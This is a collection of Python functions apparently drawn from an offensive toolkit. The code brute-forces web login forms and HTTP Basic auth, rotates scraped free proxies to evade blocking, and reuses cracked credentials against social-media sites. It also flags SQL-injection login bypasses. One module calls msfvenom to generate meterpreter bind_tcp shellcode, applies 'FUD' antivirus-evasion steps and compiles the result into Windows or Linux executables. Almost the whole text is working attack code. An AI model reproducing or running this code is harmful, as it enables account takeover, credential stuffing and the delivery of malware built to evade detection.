def submit(options, loginInfo, creds, result): tryPassword, tryUsername = creds realm = loginInfo[0] for cred in list(result.queue): if tryUsername == cred[0]: return True # don't run if find password of username if options.verbose: printf("[+] Trying: %s:%s" % (tryUsername, tryPassword), 'norm') try: proc = startBrowser(options.timeout) proc.add_password(options.url, tryUsername, tryPassword, realm) proc.open(options.url) try: proc.open(options.url) # printf("[*] Page title: ['%s']" %(proc.title()), "good") printf("[*] %s [%s]" % ([tryUsername, tryPassword], proc.title()), "good") result.put([options.url, tryUsername, tryPassword]) # printf("[*] Match found: %s" %([tryUsername, tryPassword]), "good") except Exception as err: try: if err.code == 401: if options.verbose: printf("[-] Failed %s" % (creds[::-1]), "bad") else: printf("[x] %s: %s" % (err, creds[::-1]), "bad") except: die("[x] HTTP GET:", err) except: if options.verbose: printf("[x] Failed!", "bad")
def checkAllProxy(proxyList, target): try: for proxyAddr in proxyList: proxyAddr = proxyAddr.replace("\n", "") result = connProxy(proxyAddr, target) if result: #livelist.append(result) actions.fwrite_c(TMP_PATH, "%s\n" % (proxyAddr)) #TODO use queu here except Exception as error: utils.printf(error, "bad")
def submit(URL, tryUsername, tryPassword, proxy, verbose, result): for cred in list(result.queue): if tryUsername == cred[0]: return 0 # don't run if find password of username if verbose: utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm') try: resp = requests.get(URL, auth=HTTPBasicAuth(tryUsername, tryPassword)) if resp.status_code == 200: result.put([tryUsername, tryPassword]) utils.printf("[*] Match found: %s:%s" % (tryUsername, tryPassword), "good") # pass elif resp.status_code == 401: if verbose: utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword), "bad") else: # unknown pass except Exception as err: utils.printf( "[x] Error: %s:%s\n%s at %s" % (tryUsername, tryPassword, error, URL), "bad")
def submit(optionURL, tryCreds, optionProxy, optionVerbose, result): try: proc = tbrowser.startBrowser() proc.addheaders = [('User-Agent', tbrowser.useragent())] utils.printf("[+] Checking %s" % (optionURL)) proc.open(optionURL) loginInfo = tbrowser.parseLoginForm(proc.forms()) except Exception as err: if optionVerbose: utils.printf("[x] ReAuth: %s at %s" % (err, optionURL), "bad") if not loginInfo: if optionVerbose: utils.printf( "[x] ReAuth: Can't find login form at %s" % (optionURL), "bad") else: try: loginbrute.submit( optionURL, tryCreds[::-1], optionProxy, # Reverse username + password. Dynamic submit in loginbrute "", optionVerbose, loginInfo, result, True # No key false by default, result now should be url ) except Exception as err: if optionVerbose: utils.printf("[x] ReAuth: Submitting error for %s" % (err), "bad")
def checProxyConnProvider(url="https://free-proxy-list.net/"): try: printf("[+] Getting proxy list from %s" % (url)) getproxy = startBrowser(options.timeout) getproxy.open(url) printf("[*] Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: die("[x] GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close()
def submit(url, options, tryCreds, result): try: proc = startBrowser(options.timeout) printf("[+] Checking %s" %(url)) proc.open(url) loginInfo = parseLoginForm(proc.forms()) except Exception as err: if options.verbose: printf("[x] ReAuth: %s at %s" %(err, url), "bad") if not loginInfo: if options.verbose: printf("[x] ReAuth: Can't find login form at %s" %(url), "bad") else: try: options.url = url loginbrute.submit( # Reverse username + password. Dynamic submit in loginbrute options, loginInfo, tryCreds[-2:][::-1], result ) except Exception as err: if options.verbose: printf("[x] ReAuth: Submitting error for %s" %(err), "bad")
def run(self): try: data = actions.getout(self.source) data = actions.evade(self.platform, self.evasion_tech, self.evasion_method, data, self.output_name) # Get new data, start writing to output file if self.destination[-1] != '/': self.destination += '/' output_payload = self.destination + 'output.c' actions.writeout(data, output_payload) # Write done!, start building exe file actions.build_exec(self.platform, self.architecture, output_payload, self.destination, self.output_name) except: utils.printf("Error while running module", 'bad')
def refresh(): try: listproxy = parse_proxy(get_proxy_list()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) utils.printf("Write data to %s." % (PROXY_PATH)) actions.fwrite(PROXY_PATH, listproxy) utils.printf("Write data to %s completed!" % (PROXY_PATH), "good") except Exception as error: utils.die("Error while writting proxy data", error)
def run(options, creds): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: if options.url in url: social_urls.remove(url) result = Queue() #workers = [] try: for tryCreds in creds: for url in social_urls: submit(url, options, tryCreds, result) # if len(workers) == options.threads: # do_job(workers) # del workers[:] # worker = threading.Thread( # target = submit, # args = (url, options, tryCreds, result) # ) #worker.daemon = True #workers.append(worker) #do_job(workers) #del workers[:] except KeyboardInterrupt: printf("[x] Terminated by user!", "bad") import os os._exit(0) except SystemExit: die("[x] Terminated by system!", "SystemExit") except Exception as err: die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if len(result) == 0: printf("[-] No extra valid password found", "bad") else: print_table(("Target", "Username", "Password"), *result)
def get_options(self): szOptions = len(sys.argv) if szOptions == 1: # NO ARGUMENT print_fast_help() printf("Use: %s for more infomation\n" % (self.HELP_OPTIONS)) sys.exit(0) else: try: self.parse_options(szOptions) except Exception as error: die("[x] Options: Parse options error", error)
def checkOption(options, run_options): finalOption = {} global MODE, DEF_WORDLIST # Modify URL value to correct format # Read password list # Read userlist # Convert to int(threads) try: finalOption["threads"] = int(options["-t"]) if finalOption["threads"] < 1: utils.die("Argument error", "Threads must be > 1") except Exception as ConvertError: utils.die("Invalid threads", ConvertError) if MODE == "--sqli": finalOption["passlist"] = "MyP@ssW0rd" finalOption["userlist"] = data.getSQL() else: # WARNING eval() is called. It can be unsafe finalOption["passlist"] = eval( "data.%s_pass()" % (options["-p"])).replace( "\t", "") if options["-p"] in DEF_WORDLIST else actions.fread( options["-p"]) if options["-U"]: finalOption["userlist"] = actions.lread(options["-U"]) else: finalOption["userlist"] = eval( "data.%s_user()" % (options["-u"])).replace( "\t", "") if options["-u"] in DEF_WORDLIST else actions.fread( options["-u"]) finalOption["falsekey"] = options["-k"] if run_options["--proxy"]: try: import data run_options["--proxy"] = actions.fread( "%s/liveproxy.txt" % (data.__path__[0])).split("\n") except Exception as err: utils.printf("Argument error", err) return finalOption, run_options
def check_login(opts): try: proc = startBrowser(options.timeout) proc.open(opts.url) """ Check URL type. If Website directs to other URL, options.url is website's panel else: it is login url. Example: options.url = site.com/wp-admin/ -> panel site directs user to wp-login -> login URL options.url = site.com/wp-login.php -> login URL """ if proc.geturl() != opts.url: printf("[*] Website moves to: ['%s']" % (proc.geturl()), "norm") opts.panel_url, opts.login_url = opts.url, proc.geturl() else: opts.login_url = opts.url # printf("[*] Connect success!", "good") options.attack_mode = "--loginbrute" if opts.run_options["--verbose"]: printf("[*] %s" % (proc.title()), "norm") # printf("[+] Analyzing login form....") loginInfo = parseLoginForm(proc.forms()) return loginInfo except Exception as error: try: if error.code == 401: ## GET INFORMATION resp_header = str(proc.response().info()) if "WWW-Authenticate" in resp_header: loginID = checkHTTPGetLogin(resp_header) loginInfo = (loginID, ["Password", "User Name"]) if options.verbose: printf("[+] Using HTTP GET Authentication mode", "norm") options.attack_mode = "--httpget" else: loginInfo = False else: loginInfo = False printf("[x] Target check: %s" % (error), "bad") # Error != http code except: loginInfo = False die("[x] Target check:", error) except KeyboardInterrupt: loginInfo = False finally: proc.close() return loginInfo
def checProxyConnProvider(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: utils.die("GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close()
def run(checkedURL, creds, optionThreads, optionProxy, optionVerbose): social_urls = data.social_urls().replace("\t", "").split("\n") for url in social_urls: # BUG double_free() if checkedURL in url: social_urls.remove(url) result = Queue() workers = [] try: for tryCreds in creds: for url in social_urls: if actions.size_o(workers) == optionThreads: do_job(workers) del workers[:] worker = threading.Thread(target=submit, args=(url, tryCreds, optionProxy, optionVerbose, result)) worker.daemon = True workers.append(worker) do_job(workers) del workers[:] except KeyboardInterrupt: utils.die("[x] Terminated by user!", "KeyboardInterrupt") except SystemExit: utils.die("[x] Terminated by system!", "SystemExit") except Exception as err: utils.die("[x] ReAuth: Runtime error", err) finally: result = list(result.queue) if actions.size_o(result) == 0: utils.printf("[-] No extra valid password found", "bad") else: utils.print_table(("Target", "Username", "Password"), *result)
def get_proxy_list(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) # getproxy = mechanize.Browser() # getproxy.set_handle_robots(False) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxy completed.", "good") return getproxy.response().read() except Exception as error: utils.die("Error while connecting to live proxy server!", error) finally: getproxy.close()
def getNewProxy(PROXY_PATH): def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response, re.MULTILINE) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: utils.die("GetProxy: Error while parsing proxies.", error) def checProxyConnProvider(url="https://free-proxy-list.net/"): try: utils.printf("Connecting to %s." % (url)) getproxy = tbrowser.startBrowser() user_agent = tbrowser.useragent() getproxy.addheaders = [('User-Agent', user_agent)] getproxy.open(url) utils.printf("Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: utils.die("GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close() try: listproxy = parse_proxy(checProxyConnProvider()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) utils.printf("Write data to %s." % (PROXY_PATH)) actions.fwrite(PROXY_PATH, listproxy) utils.printf("Write data to %s completed!" % (PROXY_PATH), "good") except Exception as error: utils.die("GetProxy: Error while writting data", error)
def build_exec(platform, architecture, srcPath, destPath, outname): if platform == 'windows': destPath += '{}.exe'.format(outname) else: destPath += outname build_cmd = { 'windows': { 'x86': 'i686-w64-mingw32-gcc {} -o {} -mwindows'.format( srcPath, destPath), 'x64': 'x86_x64-w64-mingw32-gcc {} -o {} -mwindows'.format( srcPath, destPath) }, 'linux': { 'x86': 'gcc {} -o {} -m32 -static'.format(srcPath, destPath), 'x64': 'gcc {} -o {} -static'.format(srcPath, destPath) } # ['android', 'davik', 'command'] } utils.printf("Generating build command", 'warn') try: build_cmd = build_cmd[platform][architecture] os.popen(build_cmd) utils.printf("Build completed at {}".format(destPath), 'good') except: utils.printf("Wrong building command. Check your options", 'bad')
def getLoginForm(optionURL, browser, verbose): ###################################### # Test connect to URL # Fetch login field # ##################################### try: browser.open(optionURL) formLoginID, formUserfield, formPasswdfield = parseLoginForm( browser.forms()) if verbose: utils.printf("Found login form", "good") return formLoginID, formUserfield, formPasswdfield except TypeError as error: utils.die("Can not find login form", error) except Exception as error: utils.die("Checking connection error", error)
def writeout(data, path): utils.printf("Trying to write new data", 'warn') try: writeData = open(path, 'w') writeData.write(data) writeData.close() utils.printf("Data has been written", 'good') except: utils.printf("Error while writing data at {}".format(path), 'bad')
def getout(path): utils.printf("Loading file", 'warn') try: getData = open(path, 'r') data = getData.read() getData.close() utils.printf("Loading data completed", 'good') return data except: utils.printf("Can not read file at {}".format(path), 'bad')
def submit(URL, tryUsername, tryPassword, proxy, verbose, result): if verbose: utils.printf("Trying: %s:%s" %(tryUsername, tryPassword), 'norm') try: resp = requests.get(URL, auth = HTTPBasicAuth(tryUsername, tryPassword)) if resp.status_code == 200: result.put([tryUsername, tryPassword]) utils.printf("[*] Match found: %s:%s" %(tryUsername, tryPassword), "good") # pass elif resp.status_code == 401: if verbose: utils.printf("[-] Failed: %s:%s" %(tryUsername, tryPassword), "bad") else: # unknown pass except Exception as err: utils.printf("[x] Error: %s:%s\n%s" %(tryUsername, tryPassword, error), "bad")
def connProxy(proxyAddr, target): try: proxyTest = tbrowser.startBrowser() user_agent = tbrowser.useragent() proxyTest.addheaders = [('User-Agent', user_agent)] utils.printf(proxyAddr) proxyTest.set_proxies({"http": proxyAddr}) proxyTest.open(target) utils.printf(proxyAddr, "good") return proxyAddr except Exception as error: utils.printf("%s %s" % (proxyAddr, error), "bad") return None finally: try: proxyTest.close() except: pass
def getnew(options): def parse_proxy(response): try: re_ip = r"\b(?:\d{1,3}\.){3}\d{1,3}\b<\/td><td>\d{1,5}" result = re.findall(re_ip, response, re.MULTILINE) result = [element.replace("</td><td>", ":") for element in result] return result except Exception as error: die("[x] GetProxy: Error while parsing proxies.", error) def checProxyConnProvider(url="https://free-proxy-list.net/"): try: printf("[+] Getting proxy list from %s" % (url)) getproxy = startBrowser(options.timeout) getproxy.open(url) printf("[*] Gathering proxies completed.", "good") return getproxy.response().read() except Exception as error: die("[x] GetProxy: Error while connecting to proxy server!", error) finally: getproxy.close() try: listproxy = parse_proxy(checProxyConnProvider()) except: listproxy = "" finally: try: listproxy = "\n".join(listproxy) printf("[*] Get %s proxies." % (len(listproxy)), "good") printf("[+] Saving to %s" % (PROXY_PATH)) fwrite(PROXY_PATH, listproxy) printf("[*] Data saved!", "good") except Exception as error: die("[x] GetProxy: Error while writting data", error)
def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = startBrowser(options.timeout) proxyTest.set_proxies({"http": proxyAddr}) if verbose: printf("[+] Trying: %s" % (proxyAddr)) proxyTest.open(options.url) if verbose: printf("[*] Success: %s" % (proxyAddr), "good") result.put(proxyAddr) except Exception as error: if verbose: printf("[x] %s %s" % (proxyAddr, error), "bad") finally: try: proxyTest.close() except: pass
def checProxyConn(proxyAddr, target, result, verbose): try: proxyTest = tbrowser.startBrowser() user_agent = tbrowser.useragent() proxyTest.addheaders = [('User-Agent', user_agent)] proxyTest.set_proxies({"http": proxyAddr}) if verbose: utils.printf("Trying: %s" % (proxyAddr)) proxyTest.open(target) if verbose: utils.printf("Success: %s" % (proxyAddr), "good") result.put(proxyAddr) except Exception as error: if verbose: utils.printf("%s %s" % (proxyAddr, error), "bad") finally: try: proxyTest.close() except: pass
def submit(optionURL, tryCred, setProxyList, setKeyFalse, optionVerbose, loginInfo, result, optionReauth): # Get login form field informations # BUG parse form issue with gmail, move to tbrowser.parseLoginForm frmLoginID, frmFields = loginInfo tryPassword, tryUsername = tryCred proc = tbrowser.startBrowser() user_agent = tbrowser.useragent() proc.addheaders = [('User-Agent', user_agent)] for cred in list(result.queue): if tryUsername == cred[0]: return 0 # don't run if find password of username if setProxyList: #Set proxy connect proxyAddr = actions.randomFromList(setProxyList) proc.set_proxies({"http": proxyAddr}) try: proc.open(optionURL) # Select login form proc.select_form(nr=frmLoginID) # FILLS ALL FIELDS https://stackoverflow.com/a/5389578 for field, cred in zip(frmFields, tryCred): proc.form[field] = cred # Send request proc.submit() if optionVerbose: utils.printf("Trying: %s:%s" % (tryUsername, tryPassword), 'norm') if setProxyList: utils.printf("Using proxy: %s" % (proxyAddr), 'norm') # Reload - useful for redirect to dashboard proc.reload() # If no login form -> success # TODO improve condition to use captcha if not tbrowser.parseLoginForm(proc.forms()): if setKeyFalse: if setKeyFalse not in proc.response().read(): # Add creds to success list # If verbose: print if tryUsername: utils.printf( "[*] Match found: %s:%s" % (tryUsername, tryPassword), "good") #result.put([tryUsername, tryPassword]) else: utils.printf("[*] Password found: %s" % (tryPassword), "good") #result.put([tryPassword]) if not optionReauth: result.put([tryUsername, tryPassword]) else: result.put([ optionURL.split("/")[2], tryUsername, tryPassword ]) # Clear object and try new username else: if optionVerbose: utils.printf( "[-] Failed: %s:%s" % (tryUsername, tryPassword), "bad") else: if tryUsername: utils.printf( "[*] Match found: %s:%s" % (tryUsername, tryPassword), "good") #result.put([tryUsername, tryPassword]) else: utils.printf("[*] Password found: %s" % (tryPassword), "good") #result.put([tryPassword]) if not optionReauth: result.put([tryUsername, tryPassword]) else: result.put( [optionURL.split("/")[2], tryUsername, tryPassword]) # Clear object and try new username else: if optionVerbose: utils.printf("[-] Failed: %s:%s" % (tryUsername, tryPassword), "bad") except mechanize.HTTPError as error: # Get blocked if optionVerbose: utils.printf( "[x] Error: %s:%s\n%s at %s" % (tryUsername, tryPassword, error, optionURL), "bad") return False except Exception as error: if optionVerbose: utils.printf( "[x] Error: %s:%s\n%s at %s" % (tryUsername, tryPassword, error, optionURL), "bad") return False finally: proc.close() return True
def run(self): try: utils.printf("Generating options", 'warn') generate = { 'windows': { 'x86': 'msfvenom -p windows/meterpreter/bind_tcp -a {} '.format( self.architecture), 'x64': 'msfvenom -p windows/x64/meterpreter/bind_tcp -a {} '. format(self.architecture) }, 'linux': { 'x86': 'msfvenom -p linux/x86/meterpreter/bind_tcp -a x86', 'x64': 'msfvenom -p linux/x64/meterpreter/bind_tcp -a x64' } } randiter = str(random.randint(7, 18)) generate = generate[self.platform][ self.architecture] + 'lport={} '.format(self.lport) generate += '--smallest -e x86/shikata_ga_nai -f c -b "\\x00\\x0a\\x0d" -i {} '.format( randiter) src_output = 'output/meterpreter_bind.c' generate += '-o {} --platform {}'.format(src_output, self.platform) utils.printf("Generating payload", 'warn') os.popen(generate) utils.printf("Output source generated at {}".format(src_output), 'good') except: utils.printf("Error while generating payload", 'bad') return '' utils.printf("Generating FUD payload", 'warn') try: data = actions.getout(src_output) data = actions.evade(self.platform, self.evasion_tech, self.evasion_method, data, self.output_name) actions.writeout(data, src_output) utils.printf("Generating FUD completed", 'good') except: utils.printf("Error while generating FUD payload", 'bad') return '' utils.printf("Building executable file", 'warn') actions.build_exec(self.platform, self.architecture, src_output, 'output/', self.output_name) utils.printf("Build completed", 'good')
def submit(options, loginInfo, tryCred, result): # Get login form field informations # frmLoginID, frmFields = loginInfo tryPassword, tryUsername = tryCred proc = startBrowser() for cred in list(result.queue): if tryUsername == cred[1]: return True if options.proxy: # Set proxy connect proxyAddr = randomFromList(options.proxy) proc.set_proxies({"http": proxyAddr}) try: proc.open(options.login_url) _form = parseLoginForm(proc.forms()) if not _form: if options.verbose: printf("[x] LoginBrute: No login form found. Possibly get blocked!") return False else: frmLoginID, frmFields = _form frmUsername, _ = frmFields if options.verbose and loginInfo != _form: printf("[+] Warning: Form field has been changed!") # Select login form proc.select_form(nr = frmLoginID) # FILLS ALL FIELDS https://stackoverflow.com/a/5389578 proc.form[frmUsername] = tryUsername proc.submit() _, _, frmPasswd = parseLoginForm(proc.forms()) proc.form[frmPasswd] = tryPassword proc.submit() # page_title = proc.title() # Send request if options.verbose: if options.proxy: printf("[+] Trying: %s through %s" %([tryUsername, tryPassword],proxyAddr), 'norm') else: printf("[+] Trying: %s" %([tryUsername, tryPassword]), 'norm') # Reload the browser. For javascript redirection and others... # proc.reload() # If no login form -> maybe success. Check conditions if not parseLoginForm(proc.forms()):# != loginInfo: test_result = check_condition(options, proc, loginInfo) if test_result == 1: printf("[*] Page title: ['%s']" %(proc.title()), "good") # "If we tried login form with username+password field" if tryUsername: printf("[*] Found: %s" %([tryUsername, tryPassword]), "good") # "Else If we tried login form with password field only" else: printf("[*] Found: %s" %([tryPassword]), "good") result.put([options.url, tryUsername, tryPassword]) elif test_result == 2 and options.verbose: printf("[+] SQL Injection vulnerable found") printf(" %s" %([tryUsername, tryPassword]), "norm") else: # Possibly Error. But sometime it is true if options.verbose: printf("[x] Get error page: %s" %([tryUsername, tryPassword]), "bad") printf(" [x] Page title: ['%s']" %(proc.title()), "bad") # "Login form is still there. Oops" else: # TODO test if web has similar text (static) if sqlerror(proc.response().read()) and options.verbose: printf("[+] SQL Injection vulnerable found") printf(" %s" %([tryUsername, tryPassword]), "norm") if options.verbose: if options.proxy: printf( "[-] Failed: %s through %s" %([tryUsername, tryPassword], proxyAddr), "bad" ) else: printf( "[-] Failed: %s" %([tryUsername, tryPassword]), "bad" ) return True except Exception as error: """ Sometimes, web servers return error code because of bad configurations, but our cred is true. This code block showing information, for special cases """ try: # Unauthenticated if error.code == 401: if options.verbose: printf("[-] Failed: %s" %([tryUsername, tryPassword]), "bad") # Server misconfiguration? Panel URL is deleted or wrong elif error.code == 404: printf("[x] %s: %s" %(error, tryCred[::-1]), "bad") if options.verbose: printf(" %s" %(proc.url()), "bad") # Other error code else: if options.verbose: printf("[x] (%s): %s" %(proc.url(), tryCred[::-1]), "bad") except: # THIS BLOCKED BY WAF printf("[x] Loginbrute: %s" %(error), "bad") return False finally: proc.close()
def getUserOptions(): global URL, MODE, r_options, DEF_WORDLIST # Default operation modes: # --brute: brute force # --sqli: sql injection bypass login (TODO) # --httpauth: http basic authentication DEF_R_MODE = ("--brute", "--sqli", "--httpauth") # Default running mode: # --verbose: display informations # --report: create task report # --proxy: Running using proxy # Default options: # -u: Read userlist from file # -p: Read passlit from file # -U: Read username / userlist directly from argument # -t: Number of threads using # -k: Set key for false condition (for special cases) # Default wordlist: default, router, unix, tomcat, cctv, mirai, http options = { "-u": "default", "-p": "default", "-t": 16, "-k": None, "-U": None, } GETPROXY = False ########### STARTING ################## if len(sys.argv) == 1: utils.print_help() sys.exit(0) idx = 1 while idx < len(sys.argv): if sys.argv[idx] in ("-h", "--help", "help"): utils.print_help() sys.exit(0) else: if sys.argv[idx][:2] == "--": if sys.argv[idx] in r_options.keys(): # --verbose", "--report", "--proxy" r_options[sys.argv[idx]] = True elif sys.argv[idx] in DEF_R_MODE: # "--brute", "--sqli", "--httpauth" MODE = sys.argv[idx] elif sys.argv[idx] == "--list": # Wordlist provided if sys.argv[idx + 1] in DEF_WORDLIST: options["-u"], options["-p"], idx = sys.argv[ idx + 1], sys.argv[idx + 1], idx + 1 else: utils.die("Error while parsing arguments", "Invalid wordlist %s" % (sys.argv[idx + 1])) elif sys.argv[idx] == "--getproxy": GETPROXY = True else: utils.die("Error while parsing arguments", "Invalid option %s" % (sys.argv[idx])) elif sys.argv[idx][:1] == "-": if sys.argv[idx] in options.keys(): # "-u", "-U", "-p", "-t", "-k" options[sys.argv[idx]], idx = sys.argv[idx + 1], idx + 1 else: utils.die("Error while parsing arguments", "Invalid option %s" % (sys.argv[idx])) else: URL = sys.argv[idx] idx += 1 URL = checkURL(URL) if GETPROXY: # TODO Auto brute using proxy after get new proxy # TODO New help banner from extras import getproxy try: threads = int(options["-t"]) except Exception as err: utils.die("GetProxy: Error while parsing arguments", err) getproxy.main(URL, threads, r_options["--verbose"]) # GET NEW PROXY LIST ONLY if not URL: sys.exit(0) # else: CHECK PROXY TO TARGET DONE, AUTO ATTACK? # r_options["--proxy"] == True if not URL: utils.die("Error while parsing arguments", "Invalid URL") utils.printf(utils.start_banner(URL, options, MODE, r_options), "good") options, r_options = checkOption(options, r_options) return URL, options, MODE, r_options
def getUserOptions(): global URL, USERLIST, PASSLIST, THREADS, KEY_FALSE, MODE, r_options # Default operation modes: # --brute: brute force # --sqli: sql injection bypass login (TODO) # --basic: http basic authentication (TODO) DEF_A_MODE = ("--brute", "--sqli", "--basic") # Default running mode: # --verbose: display informations (TODO) # --log: creating log file (TODO) # --proxy: Running using proxy DEF_R_MODE = ("--verbose", "--log", "--proxy") # Default options: # -u: Read userlist from file # -p: Read passlit from file # -U: Read username / userlist directly from argument # -t: Number of threads using #TODO Modify for new module # -k: Set key for false condition (for special cases) DEF_OPS = ("-u", "-U", "-p", "-t", "-k") options = { "-u": USERLIST, "-p": PASSLIST, "-t": THREADS, "-k": KEY_FALSE, "-U": None, } if len(sys.argv) == 1: utils.print_help() sys.exit(0) idx = 1 while idx < len(sys.argv): if sys.argv[idx] in ("-h", "--help", "help"): utils.print_help() else: if sys.argv[idx] in DEF_R_MODE: r_options[sys.argv[idx]] = True elif sys.argv[idx] in DEF_A_MODE: MODE = sys.argv[idx] idx += 1 elif sys.argv[idx] in DEF_OPS: options[sys.argv[idx]] = sys.argv[idx + 1] idx += 1 else: URL = sys.argv[idx] idx += 1 if not URL: utils.printf("An URL is required", "bad") sys.exit(1) else: utils.printf(craftbanner(URL, options, MODE, r_options), "good") URL, options, r_options = checkOption(URL, options, r_options) return URL, options, MODE, r_options